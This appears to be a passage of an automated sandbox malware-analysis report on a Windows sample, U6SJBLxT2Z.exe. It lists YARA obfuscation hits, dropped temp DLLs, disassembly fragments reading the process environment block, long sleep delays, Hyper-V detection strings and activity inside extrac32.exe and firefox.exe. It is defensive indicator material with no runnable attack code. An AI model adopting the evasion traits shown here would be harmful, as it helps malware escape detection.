        Source: Binary string: wntdll.pdbUGP source: U6SJBLxT2Z.exe, 00000002.00000003.11934530000.00000000324FF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11939159461.00000000326AC000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12020224925.0000000004F04000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12016926464.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: U6SJBLxT2Z.exe, U6SJBLxT2Z.exe, 00000002.00000003.11934530000.00000000324FF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11939159461.00000000326AC000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, extrac32.exe, extrac32.exe, 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12020224925.0000000004F04000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12016926464.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: extrac32.pdb source: U6SJBLxT2Z.exe, 00000002.00000003.11985854504.00000000026FB000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11985690204.0000000002704000.00000004.00000020.00020000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000003.15637676289.0000000000CAB000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: firefox.pdb source: extrac32.exe, 00000005.00000003.12209639063.0000000007D48000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000003.12261420021.0000000008422000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: extrac32.pdbGCTL source: U6SJBLxT2Z.exe, 00000002.00000003.11985854504.00000000026FB000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11985690204.0000000002704000.00000004.00000020.00020000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000003.15637676289.0000000000CAB000.00000004.00000001.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.11926685179.00000000048AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.11924794479.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: U6SJBLxT2Z.exe PID: 7232, type: MEMORYSTR
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328908CD push ecx; mov dword ptr [esp], ecx2_2_328908D6
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050B97A1 push es; iretd 5_2_050B97A8
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050B21AD pushad ; retf 0004h5_2_050B223F
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050E08CD push ecx; mov dword ptr [esp], ecx5_2_050E08D6
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030D813F push eax; ret 5_2_030D8141
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030BD190 push eax; iretd 5_2_030BD19C
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030BD0F0 push cs; ret 5_2_030BD121
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030BF761 push es; retf 5_2_030BF778
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030B46A7 push 00000020h; retf 5_2_030B46B5
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030D24AC push ebx; iretd 5_2_030D24AD
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030CFB6C pushad ; ret 5_2_030CFB72
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030C0AF9 push ss; retf 5_2_030C0AFF
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030C6823 push cs; iretd 5_2_030C6824
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030BEC3D push eax; retf 5_2_030BEC43
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030C4CB4 push eax; ret 5_2_030C4CC9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_6F771B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F771B5F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeFile created: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeFile created: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exe TID: 6152Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exe TID: 6152Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exe TID: 6152Thread sleep count: 9853 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exe TID: 6152Thread sleep time: -19706000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe TID: 8000Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe TID: 8000Thread sleep count: 66 > 30Jump to behavior
        Source: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe TID: 8000Thread sleep time: -66000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe TID: 8000Thread sleep count: 56 > 30Jump to behavior
        Source: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe TID: 8000Thread sleep time: -84000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\extrac32.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1763 rdtsc 2_2_328D1763
        Source: C:\Windows\SysWOW64\extrac32.exeWindow / User API: threadDelayed 9853Jump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeAPI coverage: 0.2 %
        Source: C:\Windows\SysWOW64\extrac32.exeAPI coverage: 3.1 %
        Source: C:\Windows\SysWOW64\extrac32.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_0040676F FindFirstFileW,FindClose,0_2_0040676F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B23
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030CBDE0 FindFirstFileW,FindNextFileW,FindClose,5_2_030CBDE0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeAPI call chain: ExitProcess graph end nodegraph_0-4364
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeAPI call chain: ExitProcess graph end nodegraph_0-4213
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020677649.000000000269A000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11935552707.000000000269A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWWY|
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020677649.000000000269A000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12020464964.0000000002638000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11935552707.000000000269A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16760601387.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: firefox.exe, 00000008.00000002.12314773112.0000027DA7C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_6F771B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F771B5F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1763 rdtsc 2_2_328D1763
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E289 mov eax, dword ptr fs:[00000030h]2_2_3290E289
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32897290 mov eax, dword ptr fs:[00000030h]2_2_32897290
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32897290 mov eax, dword ptr fs:[00000030h]2_2_32897290
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32897290 mov eax, dword ptr fs:[00000030h]2_2_32897290
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B42AF mov eax, dword ptr fs:[00000030h]2_2_328B42AF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B42AF mov eax, dword ptr fs:[00000030h]2_2_328B42AF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328892AF mov eax, dword ptr fs:[00000030h]2_2_328892AF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296B2BC mov eax, dword ptr fs:[00000030h]2_2_3296B2BC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296B2BC mov eax, dword ptr fs:[00000030h]2_2_3296B2BC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296B2BC mov eax, dword ptr fs:[00000030h]2_2_3296B2BC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296B2BC mov eax, dword ptr fs:[00000030h]2_2_3296B2BC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288C2B0 mov ecx, dword ptr fs:[00000030h]2_2_3288C2B0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F2AE mov eax, dword ptr fs:[00000030h]2_2_3294F2AE
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329592AB mov eax, dword ptr fs:[00000030h]2_2_329592AB
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C32C0 mov eax, dword ptr fs:[00000030h]2_2_328C32C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C32C0 mov eax, dword ptr fs:[00000030h]2_2_328C32C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B32C5 mov eax, dword ptr fs:[00000030h]2_2_328B32C5
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329632C9 mov eax, dword ptr fs:[00000030h]2_2_329632C9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288D2EC mov eax, dword ptr fs:[00000030h]2_2_3288D2EC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288D2EC mov eax, dword ptr fs:[00000030h]2_2_3288D2EC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328872E0 mov eax, dword ptr fs:[00000030h]2_2_328872E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289A2E0 mov eax, dword ptr fs:[00000030h]2_2_3289A2E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289A2E0 mov eax, dword ptr fs:[00000030h]2_2_3289A2E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289A2E0 mov eax, dword ptr fs:[00000030h]2_2_3289A2E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289A2E0 mov eax, dword ptr fs:[00000030h]2_2_3289A2E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289A2E0 mov eax, dword ptr fs:[00000030h]2_2_3289A2E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289A2E0 mov eax, dword ptr fs:[00000030h]2_2_3289A2E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328982E0 mov eax, dword ptr fs:[00000030h]2_2_328982E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328982E0 mov eax, dword ptr fs:[00000030h]2_2_328982E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328982E0 mov eax, dword ptr fs:[00000030h]2_2_328982E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328982E0 mov eax, dword ptr fs:[00000030h]2_2_328982E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A02F9 mov eax, dword ptr fs:[00000030h]2_2_328A02F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A02F9 mov eax, dword ptr fs:[00000030h]2_2_328A02F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A02F9 mov eax, dword ptr fs:[00000030h]2_2_328A02F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A02F9 mov eax, dword ptr fs:[00000030h]2_2_328A02F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A02F9 mov eax, dword ptr fs:[00000030h]2_2_328A02F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A02F9 mov eax, dword ptr fs:[00000030h]2_2_328A02F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A02F9 mov eax, dword ptr fs:[00000030h]2_2_328A02F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A02F9 mov eax, dword ptr fs:[00000030h]2_2_328A02F9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291B214 mov eax, dword ptr fs:[00000030h]2_2_3291B214
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291B214 mov eax, dword ptr fs:[00000030h]2_2_3291B214
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288A200 mov eax, dword ptr fs:[00000030h]2_2_3288A200
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288821B mov eax, dword ptr fs:[00000030h]2_2_3288821B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CA22B mov eax, dword ptr fs:[00000030h]2_2_328CA22B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CA22B mov eax, dword ptr fs:[00000030h]2_2_328CA22B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CA22B mov eax, dword ptr fs:[00000030h]2_2_328CA22B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32910227 mov eax, dword ptr fs:[00000030h]2_2_32910227
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32910227 mov eax, dword ptr fs:[00000030h]2_2_32910227
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32910227 mov eax, dword ptr fs:[00000030h]2_2_32910227
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B0230 mov ecx, dword ptr fs:[00000030h]2_2_328B0230
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF24A mov eax, dword ptr fs:[00000030h]2_2_328BF24A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F247 mov eax, dword ptr fs:[00000030h]2_2_3294F247
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295124C mov eax, dword ptr fs:[00000030h]2_2_3295124C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295124C mov eax, dword ptr fs:[00000030h]2_2_3295124C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295124C mov eax, dword ptr fs:[00000030h]2_2_3295124C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295124C mov eax, dword ptr fs:[00000030h]2_2_3295124C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294D270 mov eax, dword ptr fs:[00000030h]2_2_3294D270
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292327E mov eax, dword ptr fs:[00000030h]2_2_3292327E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292327E mov eax, dword ptr fs:[00000030h]2_2_3292327E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292327E mov eax, dword ptr fs:[00000030h]2_2_3292327E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292327E mov eax, dword ptr fs:[00000030h]2_2_3292327E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292327E mov eax, dword ptr fs:[00000030h]2_2_3292327E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292327E mov eax, dword ptr fs:[00000030h]2_2_3292327E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B273 mov eax, dword ptr fs:[00000030h]2_2_3288B273
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B273 mov eax, dword ptr fs:[00000030h]2_2_3288B273
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B273 mov eax, dword ptr fs:[00000030h]2_2_3288B273
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32891380 mov eax, dword ptr fs:[00000030h]2_2_32891380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32891380 mov eax, dword ptr fs:[00000030h]2_2_32891380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32891380 mov eax, dword ptr fs:[00000030h]2_2_32891380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32891380 mov eax, dword ptr fs:[00000030h]2_2_32891380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32891380 mov eax, dword ptr fs:[00000030h]2_2_32891380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AF380 mov eax, dword ptr fs:[00000030h]2_2_328AF380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AF380 mov eax, dword ptr fs:[00000030h]2_2_328AF380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AF380 mov eax, dword ptr fs:[00000030h]2_2_328AF380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AF380 mov eax, dword ptr fs:[00000030h]2_2_328AF380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AF380 mov eax, dword ptr fs:[00000030h]2_2_328AF380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AF380 mov eax, dword ptr fs:[00000030h]2_2_328AF380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BA390 mov eax, dword ptr fs:[00000030h]2_2_328BA390
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BA390 mov eax, dword ptr fs:[00000030h]2_2_328BA390
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BA390 mov eax, dword ptr fs:[00000030h]2_2_328BA390
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F38A mov eax, dword ptr fs:[00000030h]2_2_3294F38A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290C3B0 mov eax, dword ptr fs:[00000030h]2_2_3290C3B0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328993A6 mov eax, dword ptr fs:[00000030h]2_2_328993A6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328993A6 mov eax, dword ptr fs:[00000030h]2_2_328993A6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328963CB mov eax, dword ptr fs:[00000030h]2_2_328963CB
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329143D5 mov eax, dword ptr fs:[00000030h]2_2_329143D5
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288E3C0 mov eax, dword ptr fs:[00000030h]2_2_3288E3C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288E3C0 mov eax, dword ptr fs:[00000030h]2_2_3288E3C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288E3C0 mov eax, dword ptr fs:[00000030h]2_2_3288E3C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288C3C7 mov eax, dword ptr fs:[00000030h]2_2_3288C3C7
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C33D0 mov eax, dword ptr fs:[00000030h]2_2_328C33D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C43D0 mov ecx, dword ptr fs:[00000030h]2_2_328C43D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32889303 mov eax, dword ptr fs:[00000030h]2_2_32889303
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32889303 mov eax, dword ptr fs:[00000030h]2_2_32889303
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A9319 mov eax, dword ptr fs:[00000030h]2_2_328A9319
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C631F mov eax, dword ptr fs:[00000030h]2_2_328C631F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AE310 mov eax, dword ptr fs:[00000030h]2_2_328AE310
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AE310 mov eax, dword ptr fs:[00000030h]2_2_328AE310
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AE310 mov eax, dword ptr fs:[00000030h]2_2_328AE310
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291330C mov eax, dword ptr fs:[00000030h]2_2_3291330C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291330C mov eax, dword ptr fs:[00000030h]2_2_3291330C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291330C mov eax, dword ptr fs:[00000030h]2_2_3291330C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291330C mov eax, dword ptr fs:[00000030h]2_2_3291330C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F30A mov eax, dword ptr fs:[00000030h]2_2_3294F30A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288E328 mov eax, dword ptr fs:[00000030h]2_2_3288E328
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288E328 mov eax, dword ptr fs:[00000030h]2_2_3288E328
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288E328 mov eax, dword ptr fs:[00000030h]2_2_3288E328
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32963336 mov eax, dword ptr fs:[00000030h]2_2_32963336
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B332D mov eax, dword ptr fs:[00000030h]2_2_328B332D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C8322 mov eax, dword ptr fs:[00000030h]2_2_328C8322
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C8322 mov eax, dword ptr fs:[00000030h]2_2_328C8322
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C8322 mov eax, dword ptr fs:[00000030h]2_2_328C8322
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32888347 mov eax, dword ptr fs:[00000030h]2_2_32888347
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32888347 mov eax, dword ptr fs:[00000030h]2_2_32888347
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32888347 mov eax, dword ptr fs:[00000030h]2_2_32888347
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CA350 mov eax, dword ptr fs:[00000030h]2_2_328CA350
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32910371 mov eax, dword ptr fs:[00000030h]2_2_32910371
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32910371 mov eax, dword ptr fs:[00000030h]2_2_32910371
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E372 mov eax, dword ptr fs:[00000030h]2_2_3290E372
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E372 mov eax, dword ptr fs:[00000030h]2_2_3290E372
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E372 mov eax, dword ptr fs:[00000030h]2_2_3290E372
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290E372 mov eax, dword ptr fs:[00000030h]2_2_3290E372
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289B360 mov eax, dword ptr fs:[00000030h]2_2_3289B360
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289B360 mov eax, dword ptr fs:[00000030h]2_2_3289B360
